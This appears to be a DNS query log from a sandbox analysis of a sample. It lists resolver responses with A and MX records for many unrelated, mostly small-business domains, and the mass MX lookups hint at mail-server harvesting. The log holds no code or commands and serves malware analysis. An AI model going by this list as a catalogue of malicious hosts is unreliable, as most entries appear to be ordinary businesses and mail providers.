                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.174426079 CET1.1.1.1192.168.2.60x8c67Name error (3)winstonlf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.180182934 CET1.1.1.1192.168.2.60xe22fName error (3)elseti.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.183414936 CET1.1.1.1192.168.2.60xe36No error (0)estbest.ee185.31.240.240A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.196860075 CET1.1.1.1192.168.2.60x5708No error (0)pfprojekt.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.202827930 CET1.1.1.1192.168.2.60x57eeNo error (0)moraci.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.207854033 CET1.1.1.1192.168.2.60xf771No error (0)evstratov.de85.13.148.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.211986065 CET1.1.1.1192.168.2.60x9864No error (0)slovtain.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.211986065 CET1.1.1.1192.168.2.60x9864No error (0)slovtain.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.212559938 CET1.1.1.1192.168.2.60xf444Name error (3)elyashevich.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.218344927 CET1.1.1.1192.168.2.60x7a35No error (0)evropskypravnik.czMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.218344927 CET1.1.1.1192.168.2.60x7a35No error (0)evropskypravnik.czMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.231005907 CET1.1.1.1192.168.2.60xe255No error (0)elohin.com207.150.200.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.251202106 CET1.1.1.1192.168.2.60x28b7No error (0)aryainstrument.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.251260042 CET1.1.1.1192.168.2.60x560cName error (3)noxnoir.dknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.279619932 CET1.1.1.1192.168.2.60x5030No error (0)finaleasing.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.288288116 CET1.1.1.1192.168.2.60xaeadNo error (0)frametalent.it89.46.108.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.291415930 CET1.1.1.1192.168.2.60xf748No error (0)bokod.hu85.255.14.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.318664074 CET1.1.1.1192.168.2.60x1d00No error (0)pfprojekt.sk195.68.234.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.354696989 CET1.1.1.1192.168.2.60x1f8eNo error (0)fadeev.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.354696989 CET1.1.1.1192.168.2.60x1f8eNo error (0)fadeev.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.360701084 CET1.1.1.1192.168.2.60x9805No error (0)doriangrey.ruMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.366842031 CET1.1.1.1192.168.2.60x6442No error (0)ext.by178.172.160.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.381784916 CET1.1.1.1192.168.2.60x37d9No error (0)blagotvoritel.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.384068012 CET1.1.1.1192.168.2.60x2141No error (0)ershov.org81.177.24.84A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.384083986 CET1.1.1.1192.168.2.60xe500No error (0)r2husers.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.384083986 CET1.1.1.1192.168.2.60xe500No error (0)r2husers.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.398233891 CET1.1.1.1192.168.2.60xbae8Name error (3)bingo.cozanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.405623913 CET1.1.1.1192.168.2.60x36e7Name error (3)brevesdunsoir.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.406296015 CET1.1.1.1192.168.2.60x1c47No error (0)malibusands.net15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.406296015 CET1.1.1.1192.168.2.60x1c47No error (0)malibusands.net3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.406655073 CET1.1.1.1192.168.2.60x6fa2No error (0)la-morada.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.408925056 CET1.1.1.1192.168.2.60x1b36Name error (3)llefigaro.frnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.412533045 CET1.1.1.1192.168.2.60x4476Name error (3)cznkqhnq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.414669037 CET1.1.1.1192.168.2.60xb28dNo error (0)khodyari.com172.67.204.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.414669037 CET1.1.1.1192.168.2.60xb28dNo error (0)khodyari.com104.21.52.215A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.415678978 CET1.1.1.1192.168.2.60xaabaNo error (0)eremina.net188.120.236.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.423871994 CET1.1.1.1192.168.2.60xa6c6Name error (3)joslindisplaysinc.cononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.426897049 CET1.1.1.1192.168.2.60xfc19No error (0)mgnbizlaw.com3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.426897049 CET1.1.1.1192.168.2.60xfc19No error (0)mgnbizlaw.com15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.449214935 CET1.1.1.1192.168.2.60xd3ebNo error (0)mcsmk8.com64.71.33.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.458200932 CET1.1.1.1192.168.2.60x4a2cNo error (0)jumpnsplashwear.com66.96.160.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.459501982 CET1.1.1.1192.168.2.60xf059No error (0)azarkavin.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.459822893 CET1.1.1.1192.168.2.60xb1eaNo error (0)evropskypravnik.cz81.31.35.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.465475082 CET1.1.1.1192.168.2.60xcbd8Name error (3)princessmonty.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.474978924 CET1.1.1.1192.168.2.60x63c8Name error (3)devbreeze.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.480026960 CET1.1.1.1192.168.2.60x1c88Name error (3)rabco.benonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.516580105 CET1.1.1.1192.168.2.60x3eecName error (3)goexlife.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.539597988 CET1.1.1.1192.168.2.60xc149No error (0)neugear.ca192.185.88.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.550571918 CET1.1.1.1192.168.2.60x8d74No error (0)3marc.com69.160.38.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.621784925 CET1.1.1.1192.168.2.60xa7cdNo error (0)blagotvoritel.org87.121.166.194A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.640763044 CET1.1.1.1192.168.2.60xe96fName error (3)assiri.tknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.667948961 CET1.1.1.1192.168.2.60x9935No error (0)ershov.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.667948961 CET1.1.1.1192.168.2.60x9935No error (0)ershov.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.667948961 CET1.1.1.1192.168.2.60x9935No error (0)ershov.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.667948961 CET1.1.1.1192.168.2.60x9935No error (0)ershov.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.667948961 CET1.1.1.1192.168.2.60x9935No error (0)ershov.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.667948961 CET1.1.1.1192.168.2.60x9935No error (0)ershov.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.667948961 CET1.1.1.1192.168.2.60x9935No error (0)ershov.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.675504923 CET1.1.1.1192.168.2.60xfa1dNo error (0)reign.dk46.30.215.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.694524050 CET1.1.1.1192.168.2.60xc1cfName error (3)yoymail.itnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.703438044 CET1.1.1.1192.168.2.60xda91No error (0)moraci.it84.33.37.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.704483986 CET1.1.1.1192.168.2.60x98bcName error (3)yahoogabes.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.709155083 CET1.1.1.1192.168.2.60xc1cfName error (3)yoymail.itnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.710199118 CET1.1.1.1192.168.2.60x7b2aNo error (0)entodo.net54.203.56.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.731206894 CET1.1.1.1192.168.2.60x835aNo error (0)ace-service.fr185.184.5.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.806509018 CET1.1.1.1192.168.2.60xb7ecNo error (0)aryainstrument.com78.39.50.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.894845009 CET1.1.1.1192.168.2.60xf489No error (0)laachir.com213.186.33.87A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.898808956 CET1.1.1.1192.168.2.60xba07No error (0)finaleasing.it89.46.109.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.913264990 CET1.1.1.1192.168.2.60x4f10No error (0)slovtain.sk85.248.130.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.918189049 CET1.1.1.1192.168.2.60x6a06Name error (3)mlk546gabr.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.921936989 CET1.1.1.1192.168.2.60x62adNo error (0)fadeev.com77.222.40.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.983825922 CET1.1.1.1192.168.2.60x4557No error (0)moradfarag.com50.87.151.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.074326992 CET1.1.1.1192.168.2.60xc419No error (0)manizan.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.086591959 CET1.1.1.1192.168.2.60xc419No error (0)manizan.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.086867094 CET1.1.1.1192.168.2.60x62adNo error (0)fadeev.com77.222.40.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.087213039 CET1.1.1.1192.168.2.60xb7ecNo error (0)aryainstrument.com78.39.50.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.087363958 CET1.1.1.1192.168.2.60x4f10No error (0)slovtain.sk85.248.130.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.087980986 CET1.1.1.1192.168.2.60x4557No error (0)moradfarag.com50.87.151.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.088219881 CET1.1.1.1192.168.2.60xba07No error (0)finaleasing.it89.46.109.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.088265896 CET1.1.1.1192.168.2.60xf489No error (0)laachir.com213.186.33.87A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.088834047 CET1.1.1.1192.168.2.60x6a06Name error (3)mlk546gabr.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.096652031 CET1.1.1.1192.168.2.60x6cf1Name error (3)er.styggnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.112935066 CET1.1.1.1192.168.2.60x5379No error (0)datasense.fr144.217.97.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.113024950 CET1.1.1.1192.168.2.60x5379No error (0)datasense.fr144.217.97.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.113423109 CET1.1.1.1192.168.2.60x6ad7No error (0)datasense.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.113491058 CET1.1.1.1192.168.2.60x6ad7No error (0)datasense.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.241806984 CET1.1.1.1192.168.2.60xe18dNo error (0)doriangrey.ru62.113.86.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.241847992 CET1.1.1.1192.168.2.60xe18dNo error (0)doriangrey.ru62.113.86.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.260531902 CET1.1.1.1192.168.2.60xd32eNo error (0)manizan.com188.0.240.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.266484976 CET1.1.1.1192.168.2.60xd3f2No error (0)dunearchitecture-be01b.mail.protection.outlook.com52.101.68.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.266484976 CET1.1.1.1192.168.2.60xd3f2No error (0)dunearchitecture-be01b.mail.protection.outlook.com52.101.68.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.266484976 CET1.1.1.1192.168.2.60xd3f2No error (0)dunearchitecture-be01b.mail.protection.outlook.com52.101.73.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.266484976 CET1.1.1.1192.168.2.60xd3f2No error (0)dunearchitecture-be01b.mail.protection.outlook.com52.101.73.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.266484976 CET1.1.1.1192.168.2.60xd3f2No error (0)dunearchitecture-be01b.mail.protection.outlook.com52.101.73.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.266484976 CET1.1.1.1192.168.2.60xd3f2No error (0)dunearchitecture-be01b.mail.protection.outlook.com52.101.68.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.277198076 CET1.1.1.1192.168.2.60x7659No error (0)alt4.aspmx.l.google.com142.250.153.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.282344103 CET1.1.1.1192.168.2.60xe4a6No error (0)aspmx.l.google.com172.253.122.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.293453932 CET1.1.1.1192.168.2.60x791No error (0)mail.hope-mail.com5.161.182.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.293453932 CET1.1.1.1192.168.2.60x791No error (0)mail.hope-mail.com159.65.192.215A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.299612045 CET1.1.1.1192.168.2.60x471dNo error (0)w01c2c31.kasserver.com85.13.148.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.399745941 CET1.1.1.1192.168.2.60xb91aNo error (0)mx.jumpnsplashwear.com66.96.140.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.399745941 CET1.1.1.1192.168.2.60xb91aNo error (0)mx.jumpnsplashwear.com66.96.140.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.416115999 CET1.1.1.1192.168.2.60x217aNo error (0)mgnbizlaw-com.mail.protection.outlook.com52.101.9.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.416115999 CET1.1.1.1192.168.2.60x217aNo error (0)mgnbizlaw-com.mail.protection.outlook.com52.101.42.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.416115999 CET1.1.1.1192.168.2.60x217aNo error (0)mgnbizlaw-com.mail.protection.outlook.com52.101.8.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.416115999 CET1.1.1.1192.168.2.60x217aNo error (0)mgnbizlaw-com.mail.protection.outlook.com52.101.11.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.416115999 CET1.1.1.1192.168.2.60x217aNo error (0)mgnbizlaw-com.mail.protection.outlook.com52.101.40.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.416115999 CET1.1.1.1192.168.2.60x217aNo error (0)mgnbizlaw-com.mail.protection.outlook.com52.101.42.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.416115999 CET1.1.1.1192.168.2.60x217aNo error (0)mgnbizlaw-com.mail.protection.outlook.com52.101.8.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.457274914 CET1.1.1.1192.168.2.60xd17fNo error (0)mx.mcsmk8.com64.26.60.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.496181965 CET1.1.1.1192.168.2.60x300dName error (3)condorponteggi.itnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.763490915 CET1.1.1.1192.168.2.60xabb6No error (0)mx.yandex.ru77.88.21.249A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.846508980 CET1.1.1.1192.168.2.60x7a14No error (0)aceservice-fr0i.mail.protection.outlook.com104.47.25.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.846508980 CET1.1.1.1192.168.2.60x7a14No error (0)aceservice-fr0i.mail.protection.outlook.com104.47.24.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.865814924 CET1.1.1.1192.168.2.60x43dNo error (0)azarkavin.com193.141.65.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:25.865883112 CET1.1.1.1192.168.2.60x43dNo error (0)azarkavin.com193.141.65.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.415437937 CET1.1.1.1192.168.2.60x840bNo error (0)nihcesxway.hub.nih.gov128.231.90.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.742212057 CET1.1.1.1192.168.2.60x8c11No error (0)mail.bokod.hu185.111.89.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.747711897 CET1.1.1.1192.168.2.60x635aName error (3)ftp.princessmonty.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.750989914 CET1.1.1.1192.168.2.60xf1d4No error (0)mx1.pub.mailpod9-cph3.one.com185.164.14.118A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.754494905 CET1.1.1.1192.168.2.60x8c11No error (0)mail.bokod.hu185.111.89.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.769531012 CET1.1.1.1192.168.2.60x9908No error (0)mx1.serverclienti.net84.33.39.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.829509974 CET1.1.1.1192.168.2.60x3633No error (0)mx1.forwardemail.net138.197.213.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.843322039 CET1.1.1.1192.168.2.60x690bNo error (0)ms2.aerohosting.cz81.31.35.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.854583979 CET1.1.1.1192.168.2.60xc1f7No error (0)hub.smartweb.eu109.74.157.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.862406015 CET1.1.1.1192.168.2.60x896cNo error (0)gwmail.pfprojekt.sk195.68.234.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.008125067 CET1.1.1.1192.168.2.60xd12cNo error (0)mail.aryainstrument.com212.33.197.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.008196115 CET1.1.1.1192.168.2.60xd12cNo error (0)mail.aryainstrument.com212.33.197.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.112426996 CET1.1.1.1192.168.2.60xff59Name error (3)ftp.joslindisplaysinc.cononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.115411043 CET1.1.1.1192.168.2.60x69acName error (3)ssh.bingo.cozanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.142374039 CET1.1.1.1192.168.2.60x418dNo error (0)mail.doriangrey.ru62.113.86.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.142386913 CET1.1.1.1192.168.2.60x418dNo error (0)mail.doriangrey.ru62.113.86.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.160896063 CET1.1.1.1192.168.2.60xf5cbNo error (0)mx.finaleasing.it62.149.128.151A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.160896063 CET1.1.1.1192.168.2.60xf5cbNo error (0)mx.finaleasing.it62.149.128.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.160896063 CET1.1.1.1192.168.2.60xf5cbNo error (0)mx.finaleasing.it62.149.128.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.160896063 CET1.1.1.1192.168.2.60xf5cbNo error (0)mx.finaleasing.it62.149.128.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.160896063 CET1.1.1.1192.168.2.60xf5cbNo error (0)mx.finaleasing.it62.149.128.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.160896063 CET1.1.1.1192.168.2.60xf5cbNo error (0)mx.finaleasing.it62.149.128.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.160896063 CET1.1.1.1192.168.2.60xf5cbNo error (0)mx.finaleasing.it62.149.128.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.160896063 CET1.1.1.1192.168.2.60xf5cbNo error (0)mx.finaleasing.it62.149.128.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.160931110 CET1.1.1.1192.168.2.60xf5cbNo error (0)mx.finaleasing.it62.149.128.151A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.160931110 CET1.1.1.1192.168.2.60xf5cbNo error (0)mx.finaleasing.it62.149.128.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.160931110 CET1.1.1.1192.168.2.60xf5cbNo error (0)mx.finaleasing.it62.149.128.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.160931110 CET1.1.1.1192.168.2.60xf5cbNo error (0)mx.finaleasing.it62.149.128.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.160931110 CET1.1.1.1192.168.2.60xf5cbNo error (0)mx.finaleasing.it62.149.128.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.160931110 CET1.1.1.1192.168.2.60xf5cbNo error (0)mx.finaleasing.it62.149.128.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.160931110 CET1.1.1.1192.168.2.60xf5cbNo error (0)mx.finaleasing.it62.149.128.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.160931110 CET1.1.1.1192.168.2.60xf5cbNo error (0)mx.finaleasing.it62.149.128.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.176750898 CET1.1.1.1192.168.2.60x8e82No error (0)mx.frametalent.it62.149.128.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.176750898 CET1.1.1.1192.168.2.60x8e82No error (0)mx.frametalent.it62.149.128.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.176750898 CET1.1.1.1192.168.2.60x8e82No error (0)mx.frametalent.it62.149.128.151A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.176750898 CET1.1.1.1192.168.2.60x8e82No error (0)mx.frametalent.it62.149.128.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.176750898 CET1.1.1.1192.168.2.60x8e82No error (0)mx.frametalent.it62.149.128.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.176750898 CET1.1.1.1192.168.2.60x8e82No error (0)mx.frametalent.it62.149.128.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.176750898 CET1.1.1.1192.168.2.60x8e82No error (0)mx.frametalent.it62.149.128.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.176750898 CET1.1.1.1192.168.2.60x8e82No error (0)mx.frametalent.it62.149.128.72A (IP address)IN (0x0001)false
